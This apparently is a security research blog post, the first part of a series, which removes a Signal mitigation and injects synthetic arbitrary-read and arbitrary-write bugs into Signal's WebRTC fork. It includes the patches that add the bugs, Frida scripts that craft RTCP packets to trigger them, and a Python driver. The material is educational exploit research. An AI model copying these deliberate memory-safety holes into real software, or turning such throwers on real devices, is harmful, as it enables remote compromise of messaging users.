You Can't Spell WebRTC without RCE - Part 1 — Margin Research
You Can't Spell WebRTC without RCE - Part 1

You Can't Spell WebRTC without RCE - Part 1

Ian Dupont
by Ian Dupont
Jul 19, 2024

Injecting and Exploiting Synthetic Remote Vulnerabilities to explore Signal-iOS and WebRTC

It’s another average Friday morning and my iPhone shows 705 unread Signal messages. Signal has not completely supplanted my use of iMessage, but it does dominate communications with industry peers and privacy-conscious friends. If you are a cybersecurity practitioner reading this, you are probably in the same boat.

The continued growth and popularity of secure messaging apps combined with the ubiquity of phones in our everyday lives means a novel messaging app vulnerability is a serious security concern (consider the Pegasus spyware delivered through WhatsApp and the FORCEDENTRY exploit of iMessage). It is therefore important to increase our attention on messaging app researchincluding both bug finding and detectionto ensure our security and privacy. But for security researchers unfamiliar with messaging apps and modern mobile operating systems, this is a very tall task. iOS, and Apple research more broadly, can seem like an esoteric target with a lack of “Getting Started” reverse engineering and exploitation guides. Signal is a complex application in its own right, so researching Signal on iOS can quickly become overwhelming.

Thus is the motivation for this blog series. Over the next three posts we aim to turn the seemingly arcane and daunting task of instant messaging app research and modern mobile exploitation into a more approachable goal.

We start by investigating WebRTC, a library common in many instant messaging apps, which handles audio and video calling. Though Signal uses its own WebRTC fork, our knowledge gained is still applicable to a variety of other targets. Through this research we choose an interesting location to inject synthetic parsing vulnerabilities and practice interacting with WebRTC protocols using Frida, one of the foremost mobile research tools. We then gain familiarity with the iOS ecosystem and Signal-iOS as we plan an exploitation strategy. By investigating how Signal-iOS manages its database and how iOS maps and links libraries, we learn how to expand the capabilities of our injected primitives. After we align our target, we build a complex ARM64 ROP chain that includes conditional loops and pivoting the stack back and forth to leak the Signal on-device database. Finally, we conclude with an assessment of indicators of compromise (IOCs) to better understand how our exploit could be detected if thrown in the wild.

Simply, this series provides an initial foothold into iOS and Signal research upon which to build further skills. All code referenced in this post is available on Margin Research's WebRCE GitHub page in case you want to follow along or dig deeper into the scripts which form the final exploit.

Our journey is roughly broken into the following topics:

  1. Signal and WebRTC internals
  2. Signal-iOS specifics
  3. Setting up a research environment
  4. Frida
  5. Corellium
  6. iOS app internals
  7. iOS exploitation strategies
  8. ARM64 ROP chains
  9. iOS forensics & IOCs

This first post investigates Signal’s WebRTC library, sets up a local research environment, injects vulnerabilities and demonstrates their reachability. Part two delves deeper into Signal and iOS internals as we turn our primitives into full-fledged remote code execution (RCE). Finally, part three serves as a retrospective by evaluating the exploit from both an offensive and defensive lens.

This research was inspired by Natalie Silvanovich’s work on exploiting Android messaging apps via WebRTC. Like Natalie’s research we target WebRTC to achieve 0-click exploitation on a modern mobile target. However, unlike Natalie’s research, the vulnerabilities leveraged are purely synthetic—there are no 0-days presented here :)

Let’s start by diving into Signal and its internals and injecting some vulnerabilities!

Part 1 - Surveying Signal/WebRTC and Injecting Vulnerabilities

Diving into Signal-iOS and WebRTC

Signal is a large, complex application including platform-specific and native code. When researching such a large application we must narrow our scope; otherwise we could be at this for a long time! To maximize the impact of our research, we will target native application dependencies because of their prevalence across multiple platforms and within other applications. We can easily enumerate native dependencies by investigating Signal-iOS’s Pods. SingalRingRTC jumps out, as it is the real time communication (RTC) middleware that handles voice and video calling. It proxies traffic to WebRTC, a rather ubiquitous open source C++ library, which directly handles the calls. WebRTC is a great research target because parsing serialized data and maintaining stateful protocols are complex tasks. Furthermore, Natalie’s aforementioned research showed us WebRTC is susceptible to bugs. Time spent understanding its internals will certainly be beneficial, so let’s take a look at RTC handling and how it is integrated within Signal-iOS!

RTC and RTP and RTCP, Oh My!

Brace yourself for a number of (frustratingly similar) protocol acronyms. In a nutshell, we have the following:

Fig. 1: A high level overview of the WebRTC protocol layers. The WebRTC client connects to a remote peer through the ICE protocol. Messages received at the ICE layer are proxied to the DTLS Transport, where they are checked for message type. If DTLS, the DTLS state machine processes the packet until a secret is exchanged between peers. If not, a shared secret was already derived through SDES and the packet is proxied onward. Both branches in this logic arrive at the SRTP layer for decryption using the calculated shared secret. Decrypted packets are checked for packet type and proxied to the corresponding RTP or RTCP handler, accordingly.
Fig. 1: A high level overview of the WebRTC protocol layers

RTC is a generic term for real-time communication, not to be confused with RTP: Real-time Transport Protocol. RTP is the underlying protocol for sending communication data, audio or video, from user to user. RTP packets can be thought of as the final data payload between users. RTCP, Real-time Transport Control Protocol, is added functionality on top of RTP. RTCP manages connection information through control packets. Consequently, RTCP data packets are short and have a handful of packet types.

Both RTP and RTCP packets are wrapped by SRTP: Secure Real-time Transport Protocol. SRTP prevents replay attacks, adding encryption and message authentication to RTP/RTCP to increase the security of the stream. One thing to note is that SRTP does not define the computation of a shared secret and thus must receive one from a different layer. The SDES protocol is one option to establish a shared secret.

RTP is a UDP-based protocol and therefore TLS (used for TCP connections) does not apply. However, DTLS, Datagram Transport Layer Security, is implemented in WebRTC to provide session encryption for the UDP stream. DTLS is another option for negotiating a shared secret for SRTP, as defined in RFC 5764.

None of the protocols mentioned above actually connect the peers, which is where Interactive Connectivity Establishment (ICE) comes in. The ICE protocol establishes a session between users and is particularly useful when one or both peers are behind NAT.

Phew! That’s about ithopefully it’s clear why WebRTC is such a complicated utility.

It is worth noting that Signal maintains a public fork of Google’s WebRTC to work specifically with Signal (via RingRTC). The changes between the repos are noted in the README and we will cover one specific change shortly. It is useful to clone this repo specifically since it is the exact source that Signal fetches during compilation. RingRTC defines its dependent WebRTC version in ringrtc/config/version.properties. The webrtc.version corresponds to a tag ID in the forked WebRTC repo. This research uses RingRTC v2.42.0 and forked WebRTC tag 6261i, and all following links and code snippets reference those versions.

Receiving and Parsing Data

Calling a user starts with ICE negotiations to establish a session. From there, both sides are free to send and receive data over the ICE channel. It is useful to leverage this knowledge to trace the receipt of a packet, allowing us to understand potential 0-click attack surface.

First, the DtlsTransport class receives data at its OnReadPacket function. This function checks whether DTLS is active, and if so it will match the packet type for handling. If DTLS is not active, which it is not by default, the DTLS transport triggers a sigslot signal for the underlying transport to handle.

// webrtc/p2p/base/dtls_transport.cc
void DtlsTransport::OnReadPacket(rtc::PacketTransportInternal* transport,
                                 const char* data,
                                 size_t size,
                                 const int64_t& packet_time_us,
                                     int flags) {
    RTC_DCHECK_RUN_ON(&thread_checker_);
    RTC_DCHECK(transport == ice_transport_);
    RTC_DCHECK(flags == 0);

    if (!dtls_active_) {
        // Not doing DTLS.
        SignalReadPacket(this, data, size, packet_time_us, 0);
        return;
    }

    // ... //
}

As mentioned previously, SRTP requires a shared secret usually from the DTLS-SRTP or SDES protocol. Signal defaults to SDES and therefore DTLS simply proxies all messages to its underlying SrtpTransport. The SrtpTransport then handles the received packet signal in its inherited OnReadPacket function. Here we see some packet content checks. Specifically, that the packet has a known type, the size is reasonable, and that RTP/RTCP packets are not processed “too soon”. If these checks pass, the packet is processed.

// webrtc/pc/rtp_transport.cc
void RtpTransport::OnReadPacket(rtc::PacketTransportInternal* transport,
                                const char* data,
                                size_t len,
                                const int64_t& packet_time_us,
                                int flags) {
    
    // ... //
    
    // Filter out the packet that is neither RTP nor RTCP.
    if (packet_type == cricket::RtpPacketType::kUnknown) {
        return;
    }

    // Protect ourselves against crazy data.
    if (!cricket::IsValidRtpPacketSize(packet_type, len)) {
        RTC_LOG(LS_ERROR) << "Dropping incoming "
            << cricket::RtpPacketTypeToString(packet_type)
            << " packet: wrong size=" << len;
        return;
    }

    // RingRTC change to avoid processing RTP packets too soon
    if (!incoming_rtp_enabled_) {
        if (packet_type == cricket::RtpPacketType::kRtcp) {
            RTC_LOG(LS_INFO) << "Dropping RTCP packet because incoming RTP is disabled; len: " << len;
            return;
        } else {
            RTC_LOG(LS_INFO) << "Dropping RTP packet because incoming RTP is disabled; len: " << len;
            return;
        }
    }

    rtc::CopyOnWriteBuffer packet(data, len);
    if (packet_type == cricket::RtpPacketType::kRtcp) {
        OnRtcpPacketReceived(std::move(packet), packet_time_us);
    } else {
        OnRtpPacketReceived(std::move(packet), packet_time_us);
    }
}

Why does this check exist? We can trace Signal’s inclusion of the  incoming_rtp_enabled_ flag to this commit in Aug, 2020, shortly after Natalie’s RTC bug reports and Project Zero blog series. In fact, Signal introduced this patch specifically to detect situations where something “is broken or someone is doing an attack.” This is a logical fix that drastically reduces 0-click surface by refusing to parse any RTP/RTCP data packets prior to both parties accepting a call.

However, it should be noted this is a Signal-specific fix that affects Signal’s RingRTC implementation and its fork of WebRTC. Mainline WebRTC’s RtpTransport class does not have this flag, leaving callees potentially vulnerable to premature RTP parsing before a call is accepted.

In order to learn more about WebRTC and iOS internals, let’s remove the mitigation and reintroduce this 0-click attack surface to see what we can do with some trivial, synthetic primitives!

Removing Mitigations and Injecting Vulnerabilities

We’ll first patch Signal’s message handling code to mimic 0-click parsing in mainline WebRTC and then move on to injecting some parsing vulnerabilities.

To enable 0-click RTP parsing, we need to modify the incoming_rtp_enabled_ check for received RTP packets. This flag is initialized in RingRTC’s Rust FFI code and is set to false for incoming calls. We can either change the enable_incoming bool there to true, or just comment out the check in RtpTransport::OnReadPacket  shown abovewe’ll opt for the latter.

Now that we have 0-click parsing available, we need some vulnerabilities. As mentioned previously, we are not reporting any Signal 0-days in this post; the point of this series is a crash course in Signal, WebRTC, and iOS research. Let’s leverage Signal-WebRTC’s source code to inject our own vulnerability primitives and keep our research moving!

We need a target transport/handler for our injected vulnerabilities. The lowest layer, RTP/RTCP packet handling, is a nice target since it is where the majority of packet parsing occurs. RTCP control packets are an interesting target as they have a small variety of both protocol and app-defined payload types. RFC-4585 includes some of these application-specific options, including the Payload-specific Feedback Message (packet type 206). The payload data in these packets is variable length, making them a nice choice for some *extended functionality*. In fact, WebRTC’s implementation is rather sparse, including only Receiver Estimated Max Bitrate (REMB) and Loss Notification packets (shown below).

// webrtc/modules/rtp_rtcp/source/rtcp_packet/loss_notification.cc

// Loss Notification
// -----------------
//     0                   1                   2                   3
//     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//    |V=2|P| FMT=15  |   PT=206      |             length            |
//    +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
//  0 |                  SSRC of packet sender                        |
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//  4 |                  SSRC of media source                         |
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//  8 |  Unique identifier 'L' 'N' 'T' 'F'                            |
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// 12 | Last Decoded Sequence Number  | Last Received SeqNum Delta  |D|
//    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Let’s extend the Loss Notification packets with a read primitive. First, we need some starting point, either an object or library address. We choose to provide ourselves with the address of the current RTCPReceiver object to orient ourselves. Additionally, we include an arbitrary eight-byte read for any requested address. Note that this is not a “safe” dereference, so any requests for unmapped memory result in a crash.

diff --git a/modules/rtp_rtcp/source/rtcp_receiver.cc b/modules/rtp_rtcp/source/rtcp_receiver.cc
index 3c4c073..61e1e1b 100644
--- a/modules/rtp_rtcp/source/rtcp_receiver.cc
+++ b/modules/rtp_rtcp/source/rtcp_receiver.cc
@@ -1117,6 +1125,23 @@ void RTCPReceiver::TriggerCallbacksFromRtcpPacket(
           loss_notification->media_ssrc(), loss_notification->last_decoded(),
           loss_notification->last_received(),
           loss_notification->decodability_flag());
+    } else if (loss_notification->media_ssrc() == 0x4141) {
+      auto sdes = std::make_unique<rtcp::Sdes>();
+      char address[0x20];
+      snprintf(address, 0x20, "%p", this);
+      sdes->AddCName(loss_notification->media_ssrc(), address);
+      std::vector<std::unique_ptr<rtcp::RtcpPacket>> rtcp_packets;
+      rtcp_packets.push_back(std::move(sdes));
+      static_cast<ModuleRtpRtcpImpl2 *>(rtp_rtcp_)->SendCombinedRtcpPacket(std::move(rtcp_packets));
+    } else if (loss_notification->last_decoded() == 0x1337) {
+      unsigned long long ptr = ((unsigned long long)loss_notification->sender_ssrc() << 32) + (unsigned long long)loss_notification->media_ssrc();
+      auto sdes = std::make_unique<rtcp::Sdes>();
+      char address[0x20];
+      snprintf(address, 0x20, "0x%llx", *(unsigned long long*)ptr);
+      sdes->AddCName(loss_notification->media_ssrc(), address);
+      std::vector<std::unique_ptr<rtcp::RtcpPacket>> rtcp_packets;
+      rtcp_packets.push_back(std::move(sdes));
+      static_cast<ModuleRtpRtcpImpl2 *>(rtp_rtcp_)->SendCombinedRtcpPacket(std::move(rtcp_packets));
     }
   }

The patch above gives us the address of the current RTCPReceiver object if we send a Loss Notification packet (packet type = 206, format = 15) with the sending SSRC overwritten to 0x4141. If we modify the last_decoded sequence number to 0x1337 and include a different SSRC, the program treats the 64 bits in the sender and media SSRC as an address and sends back its value. We can have some fun here and return the values as hex strings. Because this is all at the RTCP level, the outgoing packet is encrypted once passed to the SRTP layer!

Next, let’s give ourselves an arbitrary write. To make the exploit a bit simpler, we’ll give ourselves an arbitrary memcpy. Again, this implementation is unsafe so the destination plus length must reside in valid memory. We could do this a variety of ways, but for simplicity we will extend the RTCP spec and add a fun new packet type, 222, that triggers a memcpy using data from the packet:

diff --git a/modules/rtp_rtcp/source/rtcp_receiver.cc b/modules/rtp_rtcp/source/rtcp_receiver.cc
index 3c4c073..61e1e1b 100644
--- a/modules/rtp_rtcp/source/rtcp_receiver.cc
+++ b/modules/rtp_rtcp/source/rtcp_receiver.cc
@@ -460,6 +460,14 @@ bool RTCPReceiver::ParseCompoundPacket(rtc::ArrayView<const uint8_t> packet,
             break;
         }
         break;
+      case 222: {
+        const uint8_t* pload = rtcp_block.payload();
+        uint64_t dst = ((uint64_t* )pload)[0];
+        uint32_t len = ((uint32_t* )pload)[2];
+        const uint8_t* src = pload + 0xc;
+        memcpy((void*)dst, (void*)src, (size_t)len);
+        break;
+      }
       default:
         ++num_skipped_packets_;
         break;

These are obviously contrived primitives. In reality, we would build up a handful of vulnerabilities into larger primitives to perform the injected behavior; however, for the purpose of brevity and education, these certainly suffice.

Building a Research Environment

At this point we’re ready to set up our research environment and trigger our injected vulnerabilities. We need to build two environments, the target and the thrower.

iOS Target

This research targets Signal-iOS v7.13.0.131

Signal-iOS is relatively easy to build: simply clone the repo, open in Xcode and build for your target of choice, but this process is not ideal. By default, Signal-iOS fetches RingRTC and WebRTC as stripped shared libraries. This adds significant time to our learning and exploit development, so it is worth figuring out how to keep the symbols.

Signal-iOS’s Makefile has a command to fetch the dependencies, including its RingRTC pod at Pods/SingalRingRTC. This fetches a prebuilt RingRTC binary, which we do not want.

Instead, we can clobber this SignalRingRTC directory with a clone of the open source RingRTC repo and build it ourselves! This repo actually contains a Makefile with build scripts to clone the required WebRTC source repo during compilation. This allows us to patch in our WebRTC primitives defined in the previous section!

TL;DR: WebRTC uses bin/gsync-webrtc to clone the appropriate WebRTC version (from Signal’s forked repo) to src/webrtc. From there, we can inject the vulnerabilities previously discussed. Additionally, we can patch the following build scripts to improve compilation speed and keep symbols to aid our debugging:

  1. Patch RingRTC/bin/build-ios for HOST_SIM_ONLY=yes  because, for the time being, the Xcode iOS simulator is good enough to test and trigger our bugs. Also comment out the commands which remove debug information from the output
  2. Patch webrtc/src/ to include the vulnerabilities outlined in the Removing Mitigations and Injecting Vulnerabilities section

These patches are included in our research repo as ringrtc_make.diff and webrtc.diff. If we now run make ios from the RingRTC root directory, Xcode will link in our custom RingRTC and WebRTC libraries, with symbols!

A turn-key make build-ios-debug command, available in our repo, performs all the tasks outlined in this section. All that is required is to clone Chromium’s depot tools and set the DEPOT_TOOLS environment variable to its path. Then, run the make build-ios-debug command, wait for compilation to finish, open the project in Xcode, run the app in the iOS simulator, and register your victim!

Android Thrower

We now need a throwing device to trigger the vulnerabilities and, eventually, send our RCE payloads. We have options here, but choosing a Signal-Android build and intercepting relevant RTCP functions with Frida is the easiest choice.

Building a thrower from scratch would be extremely tedious and require implementing a chunk the aforementioned protocols. Using an iOS build with Frida is a decent option; however, as of this blog post, Frida is unable to hook MacOS apps on Sonoma.

We want debug symbols so Frida can hook incoming and outgoing RTC functions. However, like Signal-iOS, Signal-Android strips shared libraries. Again we add our own compiled libraries to avoid fetching prebuilt ones. On a Linux machine, we can compile the RingRTC libraries with our own configuration and then copy them into Signal-Android/app/src/main/jniLibs/. The patches to avoid stripping symbols include:

  1. Ensuring Signal-Android does not strip shared libraries by adding packaging.jniLibs.keepDebugSymbols.add("**/*.so") to its build.gradle.kts file
  2. Changing RingRTC to build only ARM64 to speed up compilation
  3. Adding --unstripped to the build-aar command in RingRTC’s Makefile

These patches are included in our research repo as signal_android.diff and ringrtc_android.diff. We can then run make android to build our own RingRTC and WebRTC. Then, use Signal-Android’s reproducible docker build to compile the app and link in the pre-compiled shared libraries!

A turn-key make build-android-debug command, available in our repo, performs all the tasks outlined in this section. It also fetches the Android SDK tools and signs the output APK with a generic key (signing is not required if installing into a non-production AVD). All that is required is to clone Chromium’s depot tools and set the DEPOT_TOOLS environment variable to its path.

We can use any non-Play Store Android device created in Android Studio or we can root a production release AVD using a tool like rootAVD. We need Frida which offers precompiled Android ARM64 frida-server binaries on its release page*Note: we want frida-server here.*

Download and extract Frida, boot the Android AVD, and load Frida onto the device with the following commands:

$ adb push ~/Downloads/frida-server-16.3.3-android-arm64 "/data/local/tmp/"
$ adb root
$ adb shell
$ /data/local/tmp/frida-server-16.3.3-android-arm64 &

# in another terminal
$ frida-ls-devices
Id                         Type    Name                        OS              
-------------------------  ------  --------------------------  ----------------
emulator-5554              usb     Android Emulator 5554       Android 14          

All that is left to do is drag and drop the compiled APK onto the device and register a user. Now we’re ready to throw some payloads!

Triggering the Vulnerabilities

We chose Signal-Android as our thrower instead of a bespoke solution because we can easy hook RTP functions and manipulate outgoing data. Let’s break these hooks into two parts: starting the call and throwing the exploit.

Starting the Call

We want to automate the actions a user performs to make a Signal call including:

  1. Scrolling through conversations to find the callee’s conversation
  2. Selecting the conversation
  3. Pressing either the video or voice call button
  4. Pressing “Start Call”

Frida has a slick Android API and we can leverage Signal’s Java code to interface with the Signal database and UI. For instance, the following code fetches the conversation for a target phone number (a conversation with that user must be in the database or the script will fail):

/*
 *  @description: finds the desired contact conversation in the database and
 *  brings up the conversation
 */
function GetConvo() {
	Java.perform(function () {
		var SignalDatabase = Java.use("org.thoughtcrime.securesms.database.SignalDatabase");
		var Recipient = Java.use("org.thoughtcrime.securesms.recipients.Recipient");

		var targetId = SignalDatabase.recipients().getOrInsertFromE164(target_e164);
		var target = Recipient.resolved(targetId);
		var threadId = SignalDatabase.threads().getOrCreateThreadIdFor(target);

		Java.choose("org.thoughtcrime.securesms.conversationlist.ConversationListFragment", {
			onMatch: function(instance) {
				instance.getNavigator().goToConversation(targetId, threadId, 2, -1);
			},
			onComplete: function () { setTimeout(VideoCall, 2000) }
		});
	});
}

We then use that conversation to start a video call and “click” the “Start Call” button using the available activities.

The code to perform this is included in a standalone Javascript file, call.js.

Sending Modified RTCP Messages

This objective is a bit more tricky, because we need to hook in-call methods and modify outgoing data. First, we should establish our goal. We need to send two different types of messages in our exploit:

  1. Hit the read with a modified Loss Notification packet
  2. Hit the write with a type 222 RTCP packet that includes a (potentially) very long payload

We’ll approach each in a different way for the sake of experimentation.

Requesting and Retrieving a Leak

Loss Notification packets, especially for our purposes, are not very long. In fact, all the relevant triggers (sender and media SSRC, last decoded sequence number) are in the first 0x10 bytes (0x14 bytes with RTCP header). We can therefore clobber outgoing messages if they are long enough. Hooking outgoing SRTP functions shows that SDES messages, which share CNAME and other user metadata, are sent frequently during the initial connection. They seem pretty innocuous and are likely always longer than 0x10 bytes because of the included SSRC and CNAME.

If you’re observant, you may have noticed the read vulnerability creates and queues a new SDES packet to leak the data. In this case we have control over how the leak occurs because we patched the code; however, in real life we would want to leak information within expected packet types. Leaking data via an unexpected or obscure packet type early in a connection could raise a red flag.

Hooking the SDES::create function, we retrieve the buffer from the first argument and modify it in-memory before sending:

/*
 * @description: accepts an input buffer and modifies the packet to create a
 * LossNotificaiton packet (fmt=15, type=206). Note that the buffer provided
 * must be at least 0x14 bytes and its length at the time of sending should
 * be adjusted accordingly
 * @arguments:
 *  mbuf: a ptr to a buffer in memory. Must be at least 0x14 bytes long
 *  sender_ssrc: the 32-bit SSRC to put in the Sender SSRC field. Used as the
 *   upper 32-bits of an arbitrary address. This field should be sent in
 *   big-endian. If null, the existing SSRC is kept in the buffer
 *  media_ssrc: the 32-bit SSRC to put in the Sender SSRC field. Used to leak
 *   the WebRTC RTCPReceiver object (0x4141) as well as
 *   the lower 32-bits of an arbitrary address. This field should be sent in
 *   big-endian. Cannot be null.
 */
function writeLossNotification(mbuf, sender_ssrc, media_ssrc) {
    /* RTCP header */
    var fmt = 15; /* Loss Notification format type */
    /* version + has_padding + count_or_format_ */
    mbuf.add(0x00).writeU8((2<<6) + (0<<5) + (fmt & 0x1f));
    mbuf.add(0x01).writeU8(206);   // kPacketType
    mbuf.add(0x03).writeU8(0x04);  // length BigEndian ((0xc payload + 0x4 header) // 4)

    /* if requesting an arbirary address, set the Sender SSRC value */
    if (sender_ssrc != null) {
        var be = Le32ToBe32(sender_ssrc);
        mbuf.add(0x04).writeU32(be);
    }
    /* Set the Media SSRC. Cannot be null */
    if (media_ssrc == null) {
        send({"key": "error",
              "str": "media_ssrc in writeLossNotification cannot be null"});
    }
    var be = Le32ToBe32(media_ssrc);
    mbuf.add(0x08).writeU32(be);

    /*
     * set the target SSRC for the returned packet. This is matched during
     * parsing so that the leak can be successfully communicated back to the
     * driver
     */
    targetSsrc = be;

    /*
     * unique identifier must match the expected value otherwise the packet
     * will be discarded
     */
    mbuf.add(0x0c).writeU32(0x46544E4C);

    /*
     * indicate an address is embedded in the SSRCs for an arb read request.
     */
    mbuf.add(0x10).writeU16(0x3713);

    /*
     * write a hardcoded value for last_received_delta_and_decoded - not used
     * in the leak primitive
     */
    mbuf.add(0x12).writeU16(0x4444);

    if (debug) {
        send({"key": "debug", "function": "Assembled Loss Notification packet",
              "data": hexdump(mbuf, { length: 0x14 })});
    }
}

Great! This function accepts an address (broken into two 32-bit SSRCs) and modifies an outgoing packet to request a leak. Now, we need to handle the receipt of a leak. As you might have guessed, we hook the RTCPReceiver::IncomingPacket (or the function it calls, ParseCompoundPacket , would also suffice) and parse the packet ourselves if it is an incoming SDES message. If the returned SSRC matches our previously requested address, we know the CNAME field contains the value at that address.

/*
 * @description: parses an SDES message received from the target. Checks if the
 *  media SSRC matches a previously requested value. If so, it communicates the
 *  leaked address back to the driver.
 * @arguments:
 *   packet: a pointer to a packet of length `length`
 *   length: the length of the `packet`
 */
function parseSDES(packet, length) {
    var ssrc = packet.readU32();

    if (debug) {
        send({"key": "debug", "function": "RTCPReceiver::IncomingPacket",
              "data": "Received SDES packet with Sender SSRC: " +
              ssrc.toString(16) + "\n" + hexdump(packet, { length: length })});
    }

    /* If the target SSRC does not match the one received, then bail */
    if (ssrc != targetSsrc) { return }

    /*
     * if the target SSRC matches, parse the packet for a leak and communicate
     * the target SSRC and leaked value back to the driver. Reset globals and
     * await the next request
     */
    var leak = getLeakedAddress(packet, length);
    if (leak) {
        send({"key": "LeakedAddr", "val": leak, "lower32": Le32ToBe32(ssrc)});
        targetSsrc = null;
        toSendLower = null;
        toSendUpper = null;
    }
}

/*
 * @description: get a leaked address from a returned SDES packet. The leak
 *  should be in the CNAME field (6 bytes into the packet) and should be in hex
 *  ASCII text
 * @arguments:
 *   packet: a pointer to a packet of length `length`
 *   length: the length of the `packet`
 * @reutrn: an UInt64 with the leaked address or `null` if the parsing failed
 */
function getLeakedAddress(packet, length) {
    var addr = ""
    var idx = 6
    while (true) {
        let char = packet.add(idx++).readU8();
        if (char == 0) { break; }
        addr += String.fromCharCode(char);
    }
    try {
        var leak = new UInt64(addr);
        return leak;
    } catch (error) {
        console.log("Error getting leak");
        return null;
    }
}
Triggering the memcpy

We take a different approach for the write primitive, primarily because the payload we send may be longer than a typical outgoing RTCP message. We instead hook SrtpTransport::SendRtcpPacket and create our own CopyOnWriteBuffer to replace its first argument. We leverage Frida’s ability to define and call arbitrary functions to mimic program flow for creating and modifying the buffer in the process’s memory:

/*
 * @description: callable function to create a packet using size and capacity
 * rtc::CopyOnWriteBuffer::CopyOnWriteBuffer(unsigned long, unsigned long)
 */
CopyOnWriteBuffer_Init = new NativeFunction(CopyOnWriteBuffer_Init,
                                            'pointer',
                                            ['pointer',
                                                'uint64',
                                                'uint64'
                                            ]);

// ...same for CopyOnWriteBuffer_SetSize and CopyOnWriteBuffer_AppendData... //

/*
 * @description: assembles manufactured payload to trigger the arb write.
 * @arguments:
 *  pload: ArrayBuffer payload which is the `src` data to be copied
 *  address: Int in little-endian indicating the `dst` for the copy
 *  len: Int in little-endian representing the length of the copy
 */
function writePayload(pload, address, len) {
    /* payload already created, no need to proceed */
    if (payload != null) {
        send({"key": "error", "str": "Payload already set"});
        return;
    }

    var bytes  = new Uint8Array(pload);
    var size = bytes.length;
    /*
     * packet length in header is length of packet (incl. header) in dwords
     * header is 4 dwords (version + fmt as u8, type as u8, cnt as u16)
     * add additional u32 for size prepended to payload
     */
    var count = Math.floor(size/4) + 4 - 1 + 1;
    var mbuf = Memory.alloc(256+size);

    /* RTCP header */
	/* version + has_padding + count_or_format_ */
    mbuf.add(0).writeU8((2<<6) + (0<<5) + (1 & 0x1f));
    /* packet_type_ */
    mbuf.add(1).writeU8(222);

    /* length in big endian */
    mbuf.add(3).writeU8(count);
    mbuf.add(4).writeU64(address);
    mbuf.add(0xc).writeU32(len);
    for (let i = 0; i < size; i++) {
        mbuf.add(0x10+i).writeU8(bytes[i]);
    }

    /* allocate memory for custom COW buffer */
    var cow = Memory.alloc(0x1000);
    /* initialize buffer with size of payload and large max size */
    CopyOnWriteBuffer_Init(cow, 4+4*count, 3000);
    /* reset pointer in buffer to 0 prior to appending data */
    CopyOnWriteBuffer_SetSize(cow, 0);
    /* append buffer to data (will copy into start of backing buffer and set size) */
    CopyOnWriteBuffer_AppendData(cow, mbuf, 4+4*count);
    if (debug) {
        send({"key": "debug", "function": "COW",
              "data": hexdump(ptr(cow),
              { length: 0x20 })})
        send({"key": "debug", "function": "Assembled payload:",
              "data": hexdump(ptr(cow).readPointer().add(0x10).readPointer(),
              { length: 4+4*count })})
    }
    payload = cow;
}

If we hot-swap an outgoing RTCP message with this constructed packet, we should expect the target to copy user-defined data at the address of our choosing!

Testing the Triggers

All the code for throwing these tests is in the frida_scripts directory of our repo.

As an exciting conclusion to this blog post, let’s confirm we can trigger the primitives. We wrap the Frida Javascript files in a Python driver and use Frida’s send to communicate between the driver and injected hooks. A simple on_message handler in the driver manages this communication, triggering the read or write primitive depending on command line arguments:

     def on_message(self, message, data):
        """
        Frida onMessage handler for routing message and data to appropriate Driver handlers
        """
        if message["type"] == "error":
            if "description" in message and \
                    message["description"] == "Exiting Frida JS script":
                level = ""
            else:
                level = "err"
            log(message["description"], level)
            exit(1)
        if "key" in message["payload"]:
            key = message["payload"]["key"]
            if key == "CommandRequest":
                if self.target == "read":
                    log("Triggering read")
                    self.trigger_read()
                else:
                    log("Triggering write")
                    self.trigger_write()
            elif key == "notify":
                log(message["payload"]["notification"])
            elif key == "debug":
                log(message["payload"]["function"] + '\n' +
                    message["payload"]["data"].replace("\\n", "\n"), "debug")
            elif key == "LeakedAddr":
                addr = int(message["payload"]["val"])
                log("Leaked address " + hex(addr) + "!")
                self.cleanup()

    def trigger_read(self):
        """
        Trigger leak primitive by leaking the RTCPReceiver instance
        """

        mes = {"type": "command", "command": "read", "toSendUpper": None,
               "toSendLower": 0x4141}
        if self.debug:
            log("Sending leak message " + json.dumps(mes), "debug")
        self.script.post(mes)

    def trigger_write(self):
        """
        Trigger write primitive by arbitrary supply a destination address. This will crash the process.
        """

        self.script.post(
            {
                "type": "command",
                "command": "write",
                "addr": 0xdeadbeefdeadbeef,
                "len": 1337,
            },
            b'\x41' * 1337
        )
        log("Check Xcode to confirm the process crashed due to a EXC_BAD_ACCESS")
        self.cleanup()

Start the target in Xcode, start the Android emulator and Frida using adb, and run the trigger.py script with the appropriate arguments:

# get the Android thrower device id using `frida-ls-devices`
python3 trigger.py -D emulator-5554 -t <read, write> -n <number>

Throwing the read shows an address returned:

$ python3 trigger.py -D emulator-5554 -t read -n <number>
[+] Connected to Frida device
[+] Attaching to Signal on driver device
[+] Resuming Signal on driver device
[+] Loading Frida scripts
[+] Triggering primitive...
[+] Targeting <number>
[+] Triggering read
[+] Leaked address 0x11382ff40!

And throwing the write shows a crash in Xcode!

Fig 2: Triggering the arbitrary write vulnerability. Running the target device in Xcode will trigger a crash when the vulnerability is hit with a payload containing the 0xdeadbeefdeadbeef address. Xcode shows this crash at the vulnerable memcpy code with an EXC_BAD_ACCESS error. The address included in the error is 0xdeadbeefdeadc000, indicating our trigger successfully hit the vulnerable code.
Fig 2: Triggering the vulnerable memcpy using an address of 0xdeadbeefdeadbeef shows a crash due to invalid memory access in Xcode.

Next Steps

In Part 2 of this series, we will plan our attack to turn these two primitives into RCE! To do so, we will dive into:

  • More WebRTC internals
  • iOS internals and the shared cache
  • Signal-iOS message database management
  • Corellium emulation
  • ROP in ARM64

Share this article:

arrow-up icon